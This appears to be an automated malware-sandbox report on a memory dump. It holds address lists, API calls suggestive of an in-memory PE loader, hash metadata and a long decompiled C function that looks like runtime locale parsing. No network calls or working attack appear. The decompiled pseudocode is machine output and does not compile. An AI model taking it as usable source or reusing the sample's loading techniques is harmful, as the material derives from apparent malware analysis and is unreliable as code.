0x0074f7f5
0x0074f7fc
0x0074f7ff
0x0074f806
0x0074f80d
0x0074f814
0x0074f81e
0x0074f824
0x0074f829
0x0074f82b
0x0074f8db
0x0074f8dd
0x00000000
0x0074f8dd
0x0074f831
0x0074f846
0x0074f84c
0x0074f85b
0x0074f85e
0x0074f860
0x0074f863
0x0074f866
0x0074f869
0x0074f871
0x0074f873
0x00000000
0x00000000
0x0074f875
0x0074f87a
0x0074f87a
0x0074f87d
0x0074f890
0x0074f890
0x0074f891
0x0074f87f
0x0074f888
0x0074f88b
0x0074f88b
0x0074f89b
0x0074f89d
0x0074f8a1
0x0074f8a6
0x0074f8a8
0x00000000
0x00000000
0x0074f8ac
0x0074f8b1
0x0074f8b3
0x00000000
0x00000000
0x0074f8b7
0x0074f8ba
0x0074f8bc
0x0074f8f5
0x0074f8f5
0x0074f8f5
0x0074f8f9
0x00000000
0x0074f8f9
0x0074f8be
0x0074f8c0
0x0074f8c4
0x0074f8f0
0x00000000
0x0074f8f0
0x0074f8ca
0x0074f8cc
0x0074f8ce
0x0074f8eb
0x00000000
0x0074f8eb
0x0074f8d5
0x0074f8d5
0x00000000
0x0074f89d
0x0074f7cf
0x0074f7d7
0x0074f7b1
0x0074f7b1
0x0074f6dd
0x0074f6dd
0x00000000
0x0074f6dd
0x0074f794
0x0074f7a0
0x0074f7a5
0x0074f7a7
0x0074f7aa
0x0074f7ad
0x0074f7af
0x00000000
0x00000000
0x00000000
0x0074f7af
0x0074f72d
0x0074f72d
0x0074f72f
0x0074f72f
0x0074f733
0x0074f735
0x0074f73c
0x0074f73c
0x0074f737
0x0074f737
0x0074f737
0x0074f73f
0x0074f741
0x0074f744
0x0074f747
0x0074f747
0x0074f747
0x00000000
0x0074f72f
0x0074f6d8
0x0074f6d8
0x00000000

APIs

Part of subcall function 0074F14A: SetLastError.KERNEL32(0000000D,0074F6C6,0079F464,00000000,?), ref: 0074F150

SetLastError.KERNEL32(000000C1,0079F464,00000000,?), ref: 0074F6DD
GetNativeSystemInfo.KERNEL32(?,0079F464,00000000,?), ref: 0074F750
GetProcessHeap.KERNEL32(00000008,00000040), ref: 0074F7BC
HeapAlloc.KERNEL32(00000000), ref: 0074F7C3
SetLastError.KERNEL32(0000045A), ref: 0074F8D5

Part of subcall function 0074F65A: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0074F7DC,00000000,00000000,00008000,00000000), ref: 0074F666

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
String ID:
API String ID: 486403682-0
Opcode ID: 357999c0f42044b2f05efc0a84fda57e8f4af116c2ec964c5b8585a484513487
Instruction ID: 39ab84f1d28dcf577466941f595987927a2a2754f2240b1a733cd4d135dd0eca
Opcode Fuzzy Hash: 357999c0f42044b2f05efc0a84fda57e8f4af116c2ec964c5b8585a484513487
Instruction Fuzzy Hash: 85610170A00201EBDB11AF69CC85B3AB7B9FF84340F15403AE9049B281DBBCDD52CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0077E550, Relevance: 7.7, APIs: 5, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0077E550(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				intOrPtr _t293;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = E0077F98C(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x77dd4f
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x797498);
					_push( *0x797354);
					E0077E48F(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x797354;
					while(1) {
						L2:
						_t244 = E00788207(_t427, 0x351, ";");
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x797498);
							_push( *_t370);
							E0077E48F(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x797384) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E007801F5(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											E007801F5( *_t32);
										}
									}
									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											E007801F5( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											E007801F5( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											E007801F5( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0077698A();
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x7aa00c; // 0x67a7e35e
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E0077E550(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = E0077E118(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t76 = _t428 + 0x20; // 0x77dd3f
									_t421 = _t76;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = E00789367(_t444, 0x797490);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x797354;
													_v460 = 1;
													do {
														_t266 = E0078932D( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x797384;
													} while (_t362 <= 0x797384);
													_t359 = _v472 + 2;
													_t267 = E007892DD(_t376, _t359, ";");
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = E00788349(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E0077698A();
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_t273 =  *0x7aa00c; // 0x67a7e35e
																_v556 = _t273 ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = E00781CE2(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = E0077E118(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t101 = _t364 + 2; // 0x6
																	_t450 = _t101 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = E0077F98C(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_t125 = _t364 * 4; // 0xb94f
																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
																				_t128 = _t432 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = E007815D4(_t286 + 4, _v728,  &_v280);
																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					E0077698A();
																					asm("int3");
																					_t293 =  *0x7ab508; // 0x0
																					return _t293;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = E0077DE25(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							_t154 = _t432 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t403;
																							if( *_t154 ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t178 = _t432 + 8; // 0x8b56ff8b
																								_t319 = E007893AC(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x797410, 0x7f,  &_v536,  *_t178, 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = E007737C1( &_v536,  *0x7aa170, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								_t193 = _t432 + 8; // 0x8b56ff8b
																								 *_t457 =  *_t193;
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t297 = _t364 * 0xc;
																					_t200 = _t297 + 0x797350; // 0x74dd8c
																					 *0x793474(_t432);
																					_t299 =  *((intOrPtr*)( *_t200))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x7aa2a8;
																						if(_t396 != 0x7aa2a8) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t456 * 8; // 0x30ff068b
																								E007801F5( *((intOrPtr*)(_t432 + _t218 + 0x28)));
																								_t221 = _t456 * 8; // 0x30ff0c46
																								E007801F5( *((intOrPtr*)(_t432 + _t221 + 0x24)));
																								_t224 = _t364 * 4; // 0xb94f
																								E007801F5( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						_t205 = _t364 * 4; // 0xb94f
																						E007801F5( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						E007801F5(_v740);
																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return E0076FD1B(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	E0076FE4F();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return E0076FD1B(_v12 ^ _t463);
					}
				}
				L130:
			}

0x0077e550
0x0077e553
0x0077e555
0x0077e558
0x0077e559
0x0077e562
0x0077e56a
0x0077e56c
0x0077e56e
0x0077e571
0x0077e68a
0x0077e68f
0x0077e577
0x0077e577
0x0077e578
0x0077e578
0x0077e57b
0x0077e57e
0x0077e580
0x0077e583
0x0077e583
0x0077e586
0x0077e588
0x0077e58b
0x0077e590
0x0077e59e
0x0077e5a8
0x0077e5ab
0x0077e5ae
0x0077e5ae
0x0077e5b9
0x0077e5be
0x0077e5c3
0x00000000
0x0077e5c9
0x0077e5cc
0x0077e5cc
0x0077e5cf
0x0077e5d1
0x0077e5d4
0x0077e5d4
0x0077e5d4
0x0077e5d6
0x0077e5d6
0x0077e5d6
0x0077e5dc
0x00000000
0x00000000
0x0077e5e1
0x0077e5f8
0x0077e5f8
0x0077e5e3
0x0077e5e3
0x0077e5eb
0x00000000
0x0077e5ed
0x0077e5ed
0x0077e5f0
0x0077e5f6
0x00000000
0x00000000
0x00000000
0x00000000
0x0077e5f6
0x0077e5eb
0x0077e601
0x0077e606
0x0077e608
0x0077e60d
0x0077e610
0x0077e613
0x0077e616
0x0077e619
0x0077e61b
0x0077e620
0x0077e62a
0x0077e632
0x0077e63a
0x00000000
0x0077e640
0x0077e644
0x0077e691
0x0077e697
0x0077e69a
0x0077e69d
0x0077e69f
0x0077e6a3
0x0077e6a7
0x0077e6a9
0x0077e6ac
0x0077e6b1
0x0077e6a7
0x0077e6b2
0x0077e6b5
0x0077e6b7
0x0077e6b9
0x0077e6bd
0x0077e6be
0x0077e6c0
0x0077e6c3
0x0077e6c8
0x0077e6be
0x0077e6cb
0x0077e6ce
0x0077e6d1
0x0077e6d4
0x0077e6d7
0x0077e6d7
0x0077e646
0x0077e646
0x0077e649
0x0077e64c
0x0077e64e
0x0077e652
0x0077e656
0x0077e658
0x0077e65b
0x0077e660
0x0077e656
0x0077e661
0x0077e666
0x0077e668
0x0077e66d
0x0077e66f
0x0077e672
0x0077e677
0x0077e66d
0x0077e678
0x0077e67c
0x0077e67c
0x0077e67f
0x0077e683
0x0077e686
0x0077e686
0x00000000
0x0077e689
0x00000000
0x0077e63a
0x0077e5fc
0x0077e5fe
0x0077e5fe
0x00000000
0x0077e5fe
0x0077e6de
0x0077e6df
0x0077e6e0
0x0077e6e1
0x0077e6e2
0x0077e6e3
0x0077e6e8
0x0077e6eb
0x0077e6ec
0x0077e6ee
0x0077e6f4
0x0077e6fb
0x0077e6fe
0x0077e701
0x0077e702
0x0077e703
0x0077e706
0x0077e707
0x0077e70a
0x0077e710
0x0077e712
0x0077e737
0x0077e741
0x0077e747
0x0077e749
0x0077e74f
0x0077e751
0x0077e9a4
0x0077e9a5
0x00000000
0x0077e757
0x0077e757
0x0077e75b
0x0077e8c2
0x0077e8c2
0x0077e8d9
0x0077e8de
0x0077e8e1
0x0077e8e3
0x0077e8e9
0x0077e8e9
0x0077e8eb
0x0077e8eb
0x0077e8ee
0x0077e8f0
0x0077e8f6
0x0077e8f6
0x0077e8f8
0x0077e97f
0x0077e97f
0x0077e8fe
0x0077e8fe
0x0077e900
0x0077e906
0x0077e909
0x0077e90c
0x0077e912
0x00000000
0x00000000
0x0077e914
0x0077e918
0x0077e941
0x0077e941
0x0077e943
0x0077e91a
0x0077e91a
0x0077e91e
0x0077e922
0x0077e929
0x0077e92f
0x00000000
0x0077e931
0x0077e931
0x0077e934
0x0077e937
0x0077e93f
0x00000000
0x00000000
0x00000000
0x00000000
0x0077e93f
0x0077e92f
0x0077e94e
0x0077e94e
0x0077e950
0x0077e97e
0x0077e97e
0x00000000
0x0077e952
0x0077e952
0x0077e958
0x0077e959
0x0077e95a
0x0077e95b
0x0077e960
0x0077e966
0x0077e969
0x0077e96b
0x0077e972
0x0077e974
0x0077e976
0x0077e96d
0x0077e96d
0x0077e96e
0x00000000
0x0077e96e
0x0077e96b
0x00000000
0x0077e950
0x0077e947
0x0077e949
0x0077e94c
0x0077e94c
0x00000000
0x0077e94c
0x0077e985
0x0077e985
0x0077e986
0x0077e989
0x0077e98f
0x0077e98f
0x0077e998
0x0077e99a
0x00000000
0x0077e99c
0x0077e99c
0x00000000
0x0077e99c
0x0077e99a
0x00000000
0x0077e761
0x0077e761
0x0077e766
0x00000000
0x0077e76c
0x0077e76c
0x0077e771
0x00000000
0x0077e777
0x0077e777
0x0077e77d
0x0077e782
0x0077e784
0x0077e78b
0x0077e78c
0x0077e78e
0x00000000
0x00000000
0x0077e794
0x0077e794
0x0077e798
0x0077e79e
0x00000000
0x0077e7a4
0x0077e7a6
0x0077e7a7
0x0077e7aa
0x00000000
0x0077e7b0
0x0077e7b0
0x0077e7b6
0x0077e7bb
0x0077e7c5
0x0077e7c9
0x0077e7ce
0x0077e7d1
0x0077e7d3
0x00000000
0x0077e7d5
0x0077e7d5
0x0077e7d7
0x0077e7da
0x0077e7da
0x0077e7dd
0x0077e7e0
0x0077e7e0
0x0077e7eb
0x0077e7ed
0x0077e7ef
0x00000000
0x00000000
0x0077e7ef
0x00000000
0x0077e7f1
0x0077e7f1
0x0077e7f7
0x0077e7fa
0x0077e7fa
0x0077e808
0x0077e811
0x0077e816
0x0077e81c
0x0077e81f
0x0077e820
0x0077e822
0x0077e830
0x0077e830
0x0077e837
0x0077e898
0x00000000
0x0077e839
0x0077e839
0x0077e847
0x0077e84c
0x0077e84f
0x0077e851
0x0077e9c1
0x0077e9c3
0x0077e9c4
0x0077e9c5
0x0077e9c6
0x0077e9c7
0x0077e9c8
0x0077e9cd
0x0077e9d0
0x0077e9d1
0x0077e9d9
0x0077e9e0
0x0077e9e3
0x0077e9e4
0x0077e9e7
0x0077e9eb
0x0077e9ec
0x0077e9ef
0x0077e9ff
0x0077ea0b
0x0077ea22
0x0077ea27
0x0077ea2a
0x0077ea2c
0x0077ea41
0x0077ea44
0x0077ea44
0x0077ea47
0x0077ea4d
0x0077ea56
0x0077ea58
0x0077ea5b
0x0077ea62
0x0077ea65
0x0077ea6b
0x00000000
0x00000000
0x0077ea6d
0x0077ea71
0x0077ea9a
0x0077ea9a
0x0077ea73
0x0077ea73
0x0077ea77
0x0077ea7b
0x0077ea82
0x0077ea88
0x00000000
0x0077ea8a
0x0077ea8a
0x0077ea8d
0x0077ea90
0x0077ea98
0x00000000
0x00000000
0x00000000
0x00000000
0x0077ea98
0x0077ea88
0x0077eaa7
0x0077eaa7
0x0077eaa9
0x0077eaaf
0x0077eab5
0x0077eab8
0x0077eab8
0x0077eabb
0x0077eabe
